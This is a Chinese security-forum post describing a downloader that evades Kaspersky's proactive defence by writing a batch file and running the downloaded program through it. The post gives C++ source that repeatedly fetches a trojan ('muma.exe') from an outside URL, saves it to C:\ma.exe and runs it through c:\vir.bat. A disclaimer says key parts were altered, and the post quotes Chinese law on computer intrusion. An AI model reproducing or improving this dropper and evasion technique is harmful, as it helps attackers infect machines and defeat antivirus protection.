绕过卡巴主动防御策略的下载者

2009-7-27 10:44| 投稿: security

摘要: 　　卡巴检测的机理是：文件下载a.exe->文件运行a.exe（判断为下载者）　　　　新的思路：文件下载a.exe->写run.bat->运行run.bat（不判断为下载者）　　　　...

　　卡巴检测的机理是：文件下载a.exe->文件运行a.exe（判断为下载者）　　　　新的思路：文件下载a.exe->写run.bat->运行run.bat（不判断为下载者）　　　　##不提供下载，程序关键部分已经修改##　　　　刑法第２８５条规定，违反国家规定，侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的，处三年以下有期徒刑或者拘役。　　　　刑法修正案（七）在刑法第２８５条中增加两款（第二款、第三款）：　　　　“违反国家规定，侵入前款规定以外的计算机信息系统或者采用其他技术手段，获取该计算机信息系统中存储、处理或者传输的数据，或者对该计算机信息系统实施非法控制，情节严重的，处三年以下有期徒刑或者拘役，并处或者单处罚金；情节特别严重的，处三年以上七年以下有期徒刑，并处罚金。”　　　　“提供专门用于侵入、非法控制计算机信息系统的程序、工具，或者明知他人实施侵入、非法控制计算机信息系统的违法犯罪行为而为其提供程序、工具，情节严重的，依照前款的规定处罚。”　　　　/*　　　　Author: Friddy　　Email:qianyang@ssyeah.com　　QQ:568623　　*/　　　　#include "stdafx.h"　　#include <iostream.h>　　#include <fstream.h>　　#include <UrlMon.h>　　#include <string.h>　　#include <windows.h>　　#pragma comment(lib, "urlmon.lib")　　　　int APIENTRY WinMain(HINSTANCE hInstance,　　HINSTANCE hPrevInstance,　　LPSTR lpCmdLine,　　int nCmdShow)　　{ char muma[]="http://www.friddy.cn/muma.exe";　　// TODO: Place code here.　　while(true){　　HRESULT hr = URLDownloadToXXXXXXXXX(0, muma,"C:\\ma.exe", 0,NULL);　　if (hr== S_OK)　　{ const char filename[] = "c:\\vir.bat";　　ofstream o_file;　　o_file.open(filename);　　o_file <<"echo off"<<endl;　　o_file <<"C:\\ma.exe"<<endl;　　o_file.close();　　WinExec("C:\\vir.bat",0);　　return 0;　　Sleep(10000);　　}　　}　　return 0;　　}

小编推荐：欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术，请点击这里注册黑基账号，公开课频道价值万元IT培训教程免费学，让您少走弯路、事半功倍，好工作升职加薪！

免责声明：本文由投稿者转载自互联网，版权归原作者所有，文中所述不代表本站观点，若有侵权或转载等不当之处请联系我们处理，让我们一起为维护良好的互联网秩序而努力！联系方式见网站首页右下角。

鲜花

握手

雷人

路过

鸡蛋

收藏邀请

绕过卡巴主动防御策略的下载者

相关阅读

最新评论